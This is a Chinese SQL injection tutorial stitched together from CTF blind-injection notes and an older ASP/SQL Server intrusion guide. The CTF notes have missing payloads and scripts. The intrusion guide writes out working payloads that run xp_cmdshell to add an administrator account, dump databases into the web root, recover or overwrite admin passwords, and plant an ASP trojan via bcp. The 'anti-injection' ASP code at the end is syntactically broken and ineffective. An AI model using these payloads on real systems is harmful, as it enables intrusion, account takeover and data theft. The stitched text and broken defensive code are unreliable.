結合1'or 1=1#可以讀取全部數據可以利用改名的方法把修改1919810931114514為words，flag修改為id，就可以把flag讀取了。

最終payload：

盲注需要掌握的幾個函數

在網頁屏蔽了錯誤信息時就只能通過網頁返回True或者False判斷，本質上是一種暴力破解，這就是布爾盲注的利用點。

首先，判斷注入點和注入類型是一樣的。

但是盲注沒有判斷列數這一步和判斷顯示位這兩步，這是和可回顯注入的不同。

判斷完注入類型後就要判斷資料庫的長度，這里就用到了length函數。

以[WUSTCTF2020]顏值成績查詢為例

輸入參數後，發現url處有個get傳入的stunum

然後用到length函數測試是否有注入點。

發現頁面有明顯變化

將傳入變為

頁面回顯此學生不存在

那麼就可以得出資料庫名長度為3

測試發現過濾了空格

然後就是要查資料庫名了，這里有兩種方法

一、只用substr函數，直接對比

這種方法在寫腳本時可以用於直接遍歷。

二、加上ascii函數

這個payload在寫腳本時直接遍歷同樣可以，也可用於二分法查找，二分法速度更快。

接下來的步驟就和聯合注入一樣，只不過使用substr函數一個一個截取字元逐個判斷。但是這種盲注手工一個一個注十分麻煩所以要用到腳本。

直接遍歷腳本

二分法腳本

時間盲注用於代碼存在sql注入漏洞，然而頁面既不會回顯數據，也不會回顯錯誤信息

語句執行後也不提示真假，我們不能通過頁面的內容來判斷

所以有布爾盲注就必有時間盲注，但有時間盲注不一定有布爾盲注

時間盲注主要是利用sleep函數讓網頁的響應時間不同從而實現注入。

sql-lab-less8：

無論輸入什麼都只會回顯一個you are in...，這就是時間盲注的特點。

當正常輸入?id=1時時間為11毫秒

判斷為單引號字元型注入後，插入sleep語句

明顯發現響應時間為3053毫秒。

利用時間的不同就可以利用腳本跑出資料庫，後續步驟和布爾盲注一致。

爆庫

爆表

爆欄位

腳本

在進行SQL注入時,發現union,and,or被完全過濾掉了,就可以考慮使用異或注入

什麼是異或呢

異或是一種邏輯運算，運演算法則簡言之就是：兩個條件相同（同真或同假）即為假（0），兩個條件不同即為真（1），null與任何條件做異或運算都為null，如果從數學的角度理解就是，空集與任何集合的交集都為空

即 1^1=0,0^0=0,1^0=1

利用這個原理可以在union，and，or都被過濾的情況下實現注入

[極客大挑戰 2019]FinalSQL

給了五個選項但是都沒什麼用，在點擊後都會在url處出現?id。

而且union，and，or都被過濾

測試發現?id=1^1會報錯

但是?id=1^0會返回?id=1的頁面，這就是前面說的原理，當1^0時是等於1的所以返回?id=1的頁面。

根據原理寫出payload，進而寫出腳本。

爆庫

爆表

爆欄位

據此可以寫出基於異或的布爾盲注腳本

實驗推薦：課程:SQL注入初級(合天網安實驗室)

⑺ 關於SQL注入

<二>SQL注入思路

思路最重要。其實好多人都不知道SQL到底能做什麼呢？這里總結一下SQL注入入侵的總體的思路：

1. SQL注入漏洞的判斷，即尋找注入點

2. 判斷後台資料庫類型

3. 確定XP_CMDSHELL可執行情況；若當前連接數據的帳號具有SA許可權，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過幾種方法完全控制，也就完成了整個注入過程，否則繼續：

1. 發現WEB虛擬目錄

2. 上傳ASP木馬；

3. 得到管理員許可權

具體步驟：

一、SQL注入漏洞的判斷

如果以前沒玩過注入，請把IE菜單-工具-Internet選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。

為了把問題說明清楚，以下以http://www.163.com/news.asp?id=xx(這個地址是假想的)，為例進行分析，xx可能是整型，也有可能是字元串。

1、整型參數的判斷

當輸入的參數xx為整型時，通常news.asp中SQL語句原貌大致如下：

select * from 表名 where 欄位=xx，所以可以用以下步驟測試SQL注入是否存在。

最簡單的判斷方法

http://www.163.com/news.asp?id=xx』(附加一個單引號)，

此時news.asp中的SQL語句變成了

select * from 表名 where 欄位=xx』，

如果程序沒有過濾好「』」的話，就會提示 news.asp運行異常；但這樣的方法雖然很簡單，但並不是最好的，因為：

first,不一定每台伺服器的IIS都返回具體錯誤提示給客戶端，如果程序中加了cint(參數)之類語句的話，SQL注入是不會成功的，但伺服器同樣會報錯，具體提示信息為處理 URL 時伺服器上出錯。請和系統管理員聯絡。

second，目前大多數程序員已經將「』「 過濾掉，所以用」 』」測試不到注入點，所以一般使用經典的1=1和1=2測試方法，見下文：

http://www.163.com/news.asp?id=xx and 1=1, news.asp運行正常，

而且與http://www.163.com/news.asp?id=xx運行結果相同；

http://www.163.com/news.asp?id=xx and 1=2, news.asp運行異常；（這就是經典的 1=1 1=2 判斷方法）

如果以上面滿足，news.asp中就會存在SQL注入漏洞，反之則可能不能注入。

2、字元串型參數的判斷

方法與數值型參數判斷方法基本相同

當輸入的參數xx為字元串時，通常news.asp中SQL語句原貌大致如下：

select * from 表名 where 欄位='xx'，所以可以用以下步驟測試SQL注入是否存在。

http://www.163.com/news.asp?id=xx』(附加一個單引號)，此時news.asp中的SQL語句變成了
select * from 表名 where 欄位=xx』，news.asp運行異常；
http://www.163.com/news.asp?id=xx and '1'='1', news.asp運行正常，

而且與http://www.163.com/news.asp?id=xx運行結果相同；

http://www.163.com/news.asp?id=xx and '1'='2', news.asp運行異常；

如果以上滿足，則news.asp存在SQL注入漏洞，反之則不能注入

3、特殊情況的處理

有時ASP程序員會在程序員過濾掉單引號等字元，以防止SQL注入。此時可以用以下幾種方法試一試。

①大小定混合法：由於VBS並不區分大小寫，而程序員在過濾時通常要麼全部過濾大寫字元串，要麼全部過濾小寫字元串，而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等；

②UNICODE法：在IIS中，以UNICODE字元集實現國際化，我們完全可以IE中輸入的字元串化成UNICODE字元串進行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件一；

③ASCII碼法：可以把輸入的部分或全部字元全部

<4>出了上述方法以外，還有個更簡單的方法就是使用現成的工具像NB聯盟的NBSI就是一款很不錯的工具，目前最新的版本為2.2

二、判斷資料庫類型

不同的資料庫的函數、注入方法都是有差異的，所以在注入之前，我們還要判斷一下資料庫的類型。一般ASP最常搭配的資料庫是Access和SQLServer，網上超過99%的網站都是其中之一。

怎麼讓程序告訴你它使用的什麼資料庫呢？來看看：

SQLServer有一些系統變數，如果伺服器IIS提示沒關閉，並且SQLServer返回錯誤提示的話，那可以直接從出錯信息獲取，方法如下：
http://www.163.com/news.asp?id=xx;and user>0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點在and user>0，我們知道，user是SQLServer的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個 nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarchar值 」abc」 轉換數據類型為 int 的列時發生語法錯誤，呵呵，abc正是變數user的值，這樣，不廢吹灰之力就拿到了資料庫的用戶名。在以後的篇幅里，大家會看到很多用這種方法的語句。 順便說幾句，眾所周知，SQLServer的用戶sa是個等同Adminstrators許可權的角色，拿到了sa許可權，幾乎肯定可以拿到主機的 Administrator了。上面的方法可以很方便的測試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將」dbo」轉換成int的列發生錯誤，而不是」sa」。

如果伺服器IIS不允許返回錯誤提示，那怎麼判斷資料庫類型呢？我們可以從Access和SQLServer和區別入手，Access和 SQLServer都有自己的系統表，比如存放資料庫中所有對象的表，Access是在系統表[msysobjects]中，但在Web環境下讀該表會提示「沒有許可權」，SQLServer是在表[sysobjects]中，在Web環境下可正常讀取。

在確認可以注入的情況下，使用下面的語句：

http://www.163.com/news.asp?id=xx ;and (select count(*) from sysobjects)>0
http://www.163.com/news.asp?id=xx ;and (select count(*) from msysobjects)>0

如果資料庫是SQLServer，那麼第一個網址的頁面與原頁面http://www.163.com/news.asp?id=xx是大致相同的；而第二個網址，由於找不到表msysobjects，會提示出錯，就算程序有容錯處理，頁面也與原頁面完全不同。

如果資料庫用的是Access，那麼情況就有所不同，第一個網址的頁面與原頁面完全不同；第二個網址，則視乎資料庫設置是否允許讀該系統表，一般來說是不允許的，所以與原網址也是完全不同。大多數情況下，用第一個網址就可以得知系統所用的資料庫類型，第二個網址只作為開啟IIS錯誤提示時的驗證。

三、確定XP_CMDSHELL可執行情況

若當前連接數據的帳號具有SA許可權，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過以下幾種方法完全控制，以後的所有步驟都可以省

1、http://www.163.com/news.asp?id=xx and user>;0 news.asp執行異常但可以得到當前連接資料庫的用戶名(若顯示dbo則代表SA)。

2、http://www.163.com/news.asp?id=xx and db_name()>0 news.asp執行異常但可以得到當前連接的資料庫名。

3、http://www.163.com/news.asp?id=xx；exec master..xp_cmdshell 「net user aaa bbb /add」-- (master是SQL-SERVER的主數據
庫；名中的分號表示SQL-SERVER執行完分號前的語句名，繼續執行其後面的語句；「—」號是註解，表示其後面的所有內容僅為注釋，系統並不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。

4、http://www.163.com/news.asp?id=xx；exec master..xp_cmdshell 「net localgroup administrators aaa /add」-- 把剛剛增加
的帳戶aaa加到administrators組中。

5、http://www.163.com/news.asp?id=xx；backuup database 資料庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數據內容
全部備份到WEB目錄下，再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。

6、通過復制CMD創建UNICODE漏洞

http://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell 「 c:\winnt\system32\cmd.exe

c:\inetpub\scripts\cmd.exe」 便製造了一個UNICODE漏洞，通過此漏洞的利用方法，便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。

這樣你就成功的完成了一次SQL注入攻擊，先別興奮，在實踐時你就會發現這比理論要難的多會有更多的困難等著你come over ，下面GO ON如果上述條件不成立則需繼續奮斗（要掛馬了：））

GO ON~!

當上述條件不成立時就要繼續下面的步驟

(一)、發現WEB虛擬目錄

只有找到WEB虛擬目錄，才能確定放置ASP木馬的位置，進而得到USER許可權。有兩種方法比較有效。

一是根據經驗猜解，一般來說，WEB虛擬目錄是：c:\inetpub\wwwroot;

D:\inetpub\wwwroot; E:\inetpub\wwwroot等，而可執行虛擬目錄是：
c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。

二是遍歷系統的目錄結構，分析結果並發現WEB虛擬目錄；

先創建一個臨時表：temp

http://www.163.com/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));--

接下來：

1 我們可以利用xp_availablemedia來獲得當前所有驅動器,並存入temp表中：

http://www.163.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--

我們可以通過查詢temp的內容來獲得驅動器列表及相關信息

2 我們可以利用xp_subdirs獲得子目錄列表,並存入temp表中：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--

3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,並寸入temp表中：

http://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

這樣就可以成功的瀏覽到所有的目錄（文件夾）列表：

如果我們需要查看某個文件的內容，可以通過執行xp_cmdsell：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--

使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。如：bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
瀏覽temp就可以看到index.asp文件的內容了！通過分析各種ASP文件，可以得到大量系統信息，WEB建設與管理信息，甚至可以得到SA帳號的連接密碼。

當然，如果xp_cmshell能夠執行，我們可以用它來完成：

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--

通過xp_cmdshell我們可以看到所有想看到的，包括W3svc

http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript
C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'

但是，如果不是SA許可權，我們還可以使用

http://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

注意：

1、以上每完成一項瀏覽後，應刪除TEMP中的所有內容，刪除方法是：

http://www.163.com/news.asp?id=xx;delete from temp;--

2、瀏覽TEMP表的方法是：(假設TestDB是當前連接的資料庫名)
http://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0

得到表TEMP中第一條記錄id欄位的值，並與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現id欄位的值。假設發現的表名是xyz，則

http://www.163.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 where id not in('xyz'))>0

得到表TEMP中第二條記錄id欄位的值。

(二)、上傳ASP木馬

所謂ASP木馬，就是一段有特殊功能的ASP代碼，並放入WEB虛擬目錄的Scripts下，遠程客戶通過IE就可執行它，進而得到系統的USER許可權，實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法：

1、利用WEB的遠程管理功能

許多WEB站點，為了維護的方便，都提供了遠程管理的功能；也有不少WEB站點，其內容是對於不同的用戶有不同的訪問許可權。為了達到對用戶許可權的控制，都有一個網頁，要求用戶名與密碼，只有輸入了正確的值，才能進行下一步的操作,可以實現對WEB的管理，如上傳、下載文件，目錄瀏覽、修改配置等。

因此，若獲取正確的用戶名與密碼，不僅可以上傳ASP木馬，有時甚至能夠直接得到USER許可權而瀏覽系統，上一步的「發現WEB虛擬目錄」的復雜操作都可省略。

用戶名及密碼一般存放在一張表中，發現這張表並讀取其中內容便解決了問題。以下給出兩種有效方法。

A、 注入法：

從理論上說，認證網頁中會有型如：

select * from admin where username='XXX' and password='YYY' 的語句，若在正式運行此句之前，沒有進行必要的字元過濾，則很容易實施SQL注入。

如在用戶名文本框內輸入：abc』 or 1=1-- 在密碼框內輸入：123 則SQL語句變成：

select * from admin where username='abc』 or 1=1 and password='123』

不管用戶輸入任何用戶名與密碼，此語句永遠都能正確執行，用戶輕易騙過系統，獲取合法身份。

B、猜解法：

基本思路是：猜解所有資料庫名稱，猜出庫中的每張表名，分析可能是存放用戶名與密碼的表名，猜出表中的每個欄位名，猜出表中的每條記錄內容。

a 猜解所有資料庫名稱

http://www.163.com/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0

因為dbid的值從1到5，是系統用了。所以用戶自己建的一定是從6開始的。並且我們提交了 name>1 (name欄位是一個字元型的欄位和數字比較會出錯),news.asp工作異常，可得到第一個資料庫名，同理把DBID分別改成7,8，9,10,11,12…就可得到所有資料庫名。

以下假設得到的資料庫名是TestDB。

b 猜解資料庫中用戶名表的名稱

猜解法：此方法就是根據個人的經驗猜表名，一般來說，

user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。並通過語句進行判斷

http://www.163.com/news.asp?id=xx and (select count(*) from TestDB.dbo.表名)>0 若表名存在，則news.asp工作正常，否則異常。如此循環，直到猜到系統帳號表的名稱。

讀取法：SQL-SERVER有一個存放系統核心信息的表sysobjects，有關一個庫的所有表，視圖等信息全部存放在此表中，而且此表可以通過WEB進行訪問。

當xtype='U' and status>0代表是用戶建立的表，發現並分析每一個用戶建立的表及名稱，便可以得到用戶名表的名稱，基本的實現方法是：

①http://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 )>0
得到第一個用戶建立表的名稱，並與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現表的名稱。假設發現的表名是xyz，則

②http://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and
name not in('xyz'))>0 可以得到第二個用戶建立的表的名稱，同理就可得到所有用建立的表的名稱。

根據表的名稱，一般可以認定那張表用戶存放用戶名及密碼，以下假設此表名為Admin。

c 猜解用戶名欄位及密碼欄位名稱

admin表中一定有一個用戶名欄位，也一定有一個密碼欄位，只有得到此兩個欄位的名稱，才有可能得到此兩欄位的內容。如何得到它們的名稱呢，同樣有以下兩種方法。

猜解法：此方法就是根據個人的經驗猜欄位名，一般來說，用戶名欄位的名稱常用：username,name,user,account等。而密碼欄位的名稱常用：password,pass,pwd,passwd等。並通過語句進行判斷

http://www.163.com/news.asp?id=xx and (select count(欄位名) from TestDB.dbo.admin)>0 「select count(欄位名) from 表名」

語句得到表的行數，所以若欄位名存在，則news.asp工作正常，否則異常。如此循環，直到猜到兩個欄位的名稱。

讀取法：基本的實現方法是

http://www.163.com/news.asp?id=xx and (select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。
select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個欄位名，當與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現欄位的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5，6…就可得到所有的欄位名稱。

d 猜解用戶名與密碼

猜用戶名與密碼的內容最常用也是最有效的方法有：

ASCII碼逐字解碼法:雖然這種方法速度較慢，但肯定是可行的。基本的思路是先猜出欄位的長度，然後依次猜出每一位的值。猜用戶名與猜密碼的方法相同，以下以猜用戶名為例說明其過程。

http://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username

為用戶名欄位的名稱，admin為表的名稱)，若x為某一值i且news.asp運行正常時，則i就是第一個用戶名的長度。如：當輸入
http://www.163.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8時news.asp運行正常，則第一個用戶名的長度為8

http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長度之間，當m=1，2,3，…時猜測分別猜測第1,2,3,…位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin為系統用戶帳號表的名稱)，若n為某一值i且news.asp運行正常時，則i對應ASCII碼就是用戶名某一位值。如：當輸入
http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時news.asp運行正常，則用戶名的第三位為P(P的ASCII為80)；http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時news.asp運行正常，則用戶名的第9位為!(!的ASCII為80)；猜到第一個用戶名及密碼後，同理，可以猜出其他所有用戶名與密碼。注意：有時得到的密碼可能是經MD5等方式加密後的信息，還需要用專用工具進行脫密。或者先改其密碼，使用完後再改回來，見下面說明。簡單法：猜用戶名用http://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1) , flag是admin表中的一個欄位，username是用戶名欄位，此時news.asp工作異常，但能得到Username的值。與上同樣的方法，可以得到第二用戶名，第三個用戶等等，直到表中的所有用戶名。

猜用戶密碼：http://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1) , flag是admin表中的一個欄位，pwd是密碼欄位，此時news.asp工作異常，但能得到pwd的值。與上同樣的方法，可以得到第二用戶名的密碼，第三個用戶的密碼等等，直到表中的所有用戶的密碼。密碼有時是經MD5加密的，可以改密碼。

http://www.163.com/news.asp?id=xx;update TestDB.dbo.admin set pwd=' a0b923820dcc509a' where username='www';-- ( 1的MD5值為：AAABBBCCCDDDEEEF，即把密碼改成1；www為已知的用戶名)用同樣的方法當然可把密碼改原來的值。

2、利用表內容導成文件功能

SQL有BCP命令，它可以把表的內容導成文本文件並放到指定位置。利用這項功能，我們可以先建一張臨時表，然後在表中一行一行地輸入一個ASP木馬，然後用BCP命令導出形成ASP文件。

命令行格式如下：

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\163.asp –c –S localhost –U sa –P foobar
('S'參數為執行查詢的伺服器，'U'參數為用戶名，'P'參數為密碼，最終上傳了一個163.asp的木馬)

3、利用工具，如NBSI給出的一些參考數據最重要的表名：

select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

最重要的一些用戶名（默認sql資料庫中存在著的）

public
dbo
guest(一般禁止，或者沒許可權)
db_sercurityadmin
ab_dlladmin
一些默認擴展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驅動器相關
xp_dirtree 目錄
xp_enumdsn ODBC連接
xp_loginconfig 伺服器安全模式信息
xp_makecab 創建壓縮卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 終端進程，給出一個PID

(三)、得到系統的管理員許可權

ASP木馬只有USER許可權，要想獲取對系統的完全控制，還要有系統的管理員許可權。怎麼辦？提升許可權的方法有很多種：

上傳木馬，修改開機自動運行的.ini文件(它一重啟，便死定了)；

復制CMD.exe到scripts，人為製造UNICODE漏洞；

下載SAM文件，破解並獲取OS的所有用戶名密碼；

等等，視系統的具體情況而定，可以採取不同的方法。

那麼我們怎麼防注入呢？程序如下加入到asp或html或php或cgi裡面都可以。經過測試。加入如 top.asp文件中開頭

方法一：

<%if session("username"="" or session("userkey"="" then
response.redirect "../../"
end if%>

(說明：只要有用戶注入則跳轉到../../目錄，呵呵，看你怎麼給我注入)

方法二：

<%
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER")
server_v2=Cstr(Request.ServerVariables("SERVER_NAME")
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450>"
response.write "<tr><td style=「font:9pt Verdana">"
response.write "你提交的路徑有誤，禁止從站點外部提交數據請不要亂該參數！"
response.write "</td></tr></table></center>"
response.end
end if
%>

(說明：只要有用戶注入則判斷為外部連接哦，呵呵，看你怎麼給我注入)

方法三：

<% dim From_url,Serv_url
From_url = Cstr(Request.ServerVariables("HTTP_REFERER")
Serv_url = Cstr(Request.ServerVariables("SERVER_NAME")
if mid(From_url,8,len(Serv_url)) <> Serv_url then
response.write "NO"
response.redirect("../"
response.end
end if%>